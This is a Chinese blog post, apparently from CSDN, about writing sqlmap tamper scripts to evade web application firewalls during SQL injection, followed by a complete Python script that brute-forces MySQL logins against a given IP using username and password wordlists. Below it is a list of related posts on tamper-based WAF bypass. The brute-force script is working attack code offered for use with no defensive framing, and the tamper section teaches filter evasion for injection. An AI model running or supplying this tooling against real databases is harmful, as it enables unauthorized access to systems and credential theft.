tamper脚本&mysql爆破脚本编写

最新推荐文章于 2024-01-31 07:18:14 发布
最新推荐文章于 2024-01-31 07:18:14 发布
阅读量1k 收藏 1
点赞数 1
分类专栏: python 内网渗透 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49183673/article/details/123447812
版权

一、tamper编写

tamper概念:

sqlmap的--tamper参数可以引入用户自定义的脚本来修改注入时的payload,由此可以使用tamper来绕过waf,替换被过滤的关键字等。

基本操作:

查看脚本:python sqlmap.py --list-tampers

使用脚本:python sqlmap.py --tamper=script_name

示例tamper脚本编写:

#!/usr/bin/env python          #到环境设置里查找python的安装路径,并调用该路径下的python解释器

from lib.core.enums import PRIORITY       #导入sqlmap中lib.core.enums中的PRIORITY函数
from lib.core.common import singleTimeWarnMessage
singleTimeWarnMessage('warning')        #设置告警信息,用于在控制台中打印出告警信息
__priority__ = PRIORITY.LOW    #当前脚本调用的优先级(一般)

def dependencies():            #声明当前脚本适用/不适用的范围,可以为空
    pass

def tamper(payload,**kwargs):    #定义一个tamper函数,用于篡改payload

    '''

    Args:
        payload: 传进来的有效载荷
        **kwargs:字典参数

    Returns:

    '''

    return payload.replace(',','test') if payload else payload        #将payload中的逗号替换为test

 如果使用者使用了多个tamper,sqlmap就会根据每个tamper定义的PRIORITY的优先级参数调用,较高级别的tamper,如果有两个tamper需要同时使用,需要注意优先级问题。

二、pymysql库的基本使用

import pymysql
#建立连接
conn = pymysql.connect(
    host = '127.0.0.1',
    port = 3306,
    user = 'root',
    password = 'root',
    database = 'mysql',
    charset = 'utf8'

)

#创建游标对象
cursor = conn.cursor()
#执行SQL语句
cursor.execute('select * from db')
#获取结果数据
# print(cursor.fetchone())
print(cursor.fetchall())
# print(cursor.fetchmany())
#关闭数据库
cursor.close()

三、mysql爆破脚本编写

import pymysql
import argparse

def bruteforce(user,password,ip):
    with open(user,'r',encoding='utf8') as u:
        with open(password,'r',encoding='utf8') as p:
            for i in u:
                for j in p:
                    i = i.strip('\n')
                    j = j.strip('\n')
                    try:
                        conn = pymysql.connect(
                            host=ip,
                            user = i,
                            password = j,
                            database = 'mysql',
                            port = 3306,
                            charset = 'utf8'
                        )
                        if conn:
                            print(f'[+] 爆破成功: {i}/{j}')
                            conn.close()
                    except:
                        pass
def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('-u','--user',dest='user',help='input username.txt path',default='root')
    parser.add_argument('-p','--password',dest='password',help='input password',default='root')
    parser.add_argument('-i','--ip',dest='ip',help='input IP',default='127.0.0.1')
    option = parser.parse_args()
    if option.user and option.password:
        bruteforce(option.user,option.password,option.ip)
    else:
        print('未指定username.txt或password.txt')

if __name__ == '__main__':
    main()

嘎嘎不是鸭
关注
专栏目录
sqlmap常用绕过脚本
L_lemo004的博客
10-20 1298
使用方法–tamper xxx.py apostrophemask.py用UTF-8全角字符替换单引号字符 apostrophenullencode.py 用非法双字节unicode字符替换单引号字符 appendnullbyte.py在payload末尾添加空字符编码 base64encode.py 对给定的payload全部字符使用Base64编码 between.py分别用“NOT BETWEEN 0 AND #”替换大于号“>”,“BETWEEN # AND #”替换等于号“=” bluec
sqlmap tamper mysql_Sqlmap Tamper大全(1)
weixin_39522423的博客
01-19 322
1 * Input: 1 AND 9227=92272 *Output:1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227View Codesqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MS-SQL,,MYSQL,ORACLE和POSTGRESQL。SQLMAP采用四种独特的SQL注入技术...
一个tamper脚本
https://www.cnblogs.com/zpchcbd/
05-13 815
这个脚本的编是有关于我博客里面的一篇过狗文章 大家可以参考下 https://blog.csdn.net/q1352483315/article/details/90175002 #!/usr/bin/env python # author:cbd666 """ Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) Se...
sqlmap tamper脚本_总结一些SqlMap的常用tamper脚本释义
weixin_39631007的博客
11-26 833
要想成为一名合格的“脚本小子”,我们首先需要一个强大的工具,然后利用好他的脚本。但是脚本也不能乱用,首先就是要了解一下SqlMap的常用的脚本,然后分清楚场合进行利用。(好的,看开头又是一篇水文。) 刚刚也看到了咱们论坛有个帖子和这个内容差不多,我没有数我总结了多少个,但是希望我们两个的内容是可以相互补充的。(刚刚群里大佬说,这种文章还用总结?百度一搜一大堆~~ ...
Sqlmap Tamper/改 学习
Goodric的博客
04-26 1909
sqlmap的--tamper参数可以引入用户自定义的脚本修改注入时的payload ,达到sql注入时对一些敏感字符的一些绕过
sqlmap脚本安全
Hq_Dream的博客
01-05 4208
 脚本名:apostrophemask.py 作用:用utf8代替引号《Example: ("1 AND '1'='1") '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'》 作用:当数据库为mysql时绕过防火墙,每个关键字之前添加mysql版本评论 Example:   ("value' UNION ALL SELECT CONCAT(
mysql insert 注入_SQLMap Insert注入踩坑记
weixin_39773239的博客
02-01 1146
*本文原创作者:Conan,本文属 FreeBuf 原创奖励计划,未经许可禁止转载前言本篇文章是在做ctf bugku的一道sql insert盲注的题(题目地址:insert盲注)中踩到的坑,觉得还挺有趣的,于是便有了今天的文章,如有纰漏还望大佬们多多指正。进入主题1. 判断注入点明显的insert类型的注入,注入点在X-Forwarded-For,但关闭了错误提示并且没有回显,因此只能进行时间...
安全mysql_Fuzz绕过安全狗4.0实现SQL注入
weixin_42125192的博客
02-05 299
0×00 前言本文使用了burp的intruder模块进行fuzz,并修改了sqlmap工具的tamper脚本,对安全狗进行绕过。0×01注入绕waf过常用手法使用大小绕过使用/**/注释符绕过使用大的数据包绕过使用/!**/注释符绕过……0×02本文使用的手法是/**/注释符首先搭建好一个有sql注入的测试平台,在服务器安装安全狗4.0版本中间件和数据库使用的是apache+mysql+php...
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5552
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
红队专题-渗透工具-sqlmap
热门推荐
aming小老弟
01-29 2万+
目标对象 请求 优化 —线程。
sqlmap-tamper脚本分类
09-22
web渗透,sqlmap脚本分类。渗透
SQLMapTamper脚本
最新发布
m0_62207482的博客
01-31 3336
SQLMap是一款用来检测与利用SQL注入漏洞的免费 开源工具,不仅可以实现SQL注入漏洞的检测与利用的自动化处理,而且其自带 的Tamper脚本可以帮助我们绕过IDS/WAF的检测。虽然SQLMap提供了这么多的Tamper脚本,但是在实际使用的过程中,网站 的安全防护并没有那么简单,可能过滤了许多敏感的字符以及相关的函数。这个 时候就需要我们针对目标的防护体系手动构建相应的Tamper脚本Tamper脚本的构建非常简单,其实渗透测试中真正的难点在于如何针对目标 网站的防护找出对应的绕过方法。
SQLmap Tamper方法(笔记)
qq_41320827的博客
02-20 781
0x00 $ python sqlmap.py --list-tampers #查看内置tamper sqlmap提供了很多的内置tamper,其包含了常见数据库的sql注入绕过,可在特定条件下进行SQL注入绕过防御。 0x01 --tamper=xxx.py 使用时加上tamper选项即可。 0x02 根据具体情况编自己的tamper脚本 依据自己当前分析或fuzz出的原理 照猫画虎...
sqlmaptamper脚本编写
内心不种满鲜花就会长满杂草
07-26 9015
目录 前言 tamper脚本实战 前言 sqlmap是一个自动化的SQL注入工具,而tamper则是对其进行扩展的一系列脚本,主要功能是对本来的payload进行特定的更改以绕过waf。 为了说明tamper的结构,让我们从一个最简单的例子开始 # sqlmap/tamper/escapequotes.py from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOWEST def dependencies():
mysql常用的tamper脚本,tampermonkey 实用脚本
weixin_30913041的博客
03-18 567
@2018/11/29使用背景自从开始使用高分屏的 thinkpad,我总觉得那些经常光顾的网站字体太小,看起来既费劲又容易睡觉,因此就想着把它们调大一点。为了从系统层面解决这一问题,我加大了系统的整体字号:拒绝使用百分比缩放图标尺寸那样无论使用什么字体、怎么调整,都会模糊使用仅更改字体大小将下拉列表项的字体全部设置为 10 号(默认9号)。做了以上设置,打开资源管理器以及安装的软件,字体都要大一...
sqlmap tamper脚本编写
whatday的专栏
03-14 8320
0x00 sqlmap tamper简介 sqlmap是一个自动化的SQL注入工具,而tamper则是对其进行扩展的一系列脚本,主要功能是对本来的payload进行特定的更改以绕过waf。 0x01 一个最小的例子 为了说明tamper的结构,让我们从一个最简单的例子开始 # sqlmap/tamper/escapequotes.py from lib.core.enums impo
sqlmap tamper mysql_sqlmap tamper的使用
weixin_35615591的博客
01-19 171
前言在早之前我对于tamper的使用一直都是停留在错误的思维。想着bypass,应该要先手动fuzz出规则来,然后再tamper使用。直到今天,才察觉根本不需要一定要fuzz出具体的规则来,无脑堆叠tamper,只要能够过就行了。而且sqlmap上面有那么多bypass 的tamper不使用是不是太浪费了?普通tamper搭配方式:tamper=apostrophemask,apostroph...
tamper脚本编写与mitmdump
weixin_44747030的博客
06-08 568
tamper脚本编写与mitmdump
tamper参数
weixin_33842328的博客
06-16 227
"tamper/apostrophemask.py","tamper/equaltolike.py","tamper/greatest.py","tamper/space2hash.py","tamper/apostrophenullencode.py","tamper/halfversionedmorekeywords.py","tamper/space2morehash.py
SQLMap tamper脚本:绕过WAF与渗透测试指南
"SQLMapTamper文档详细介绍了如何使用SQLMaptamper脚本来绕过Web应用程序的敏感字符过滤和WAF规则,以便进行渗透测试。文档涵盖了tamper脚本的作用、用法以及针对不同数据库类型的tamper脚本选择。" 在网络安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值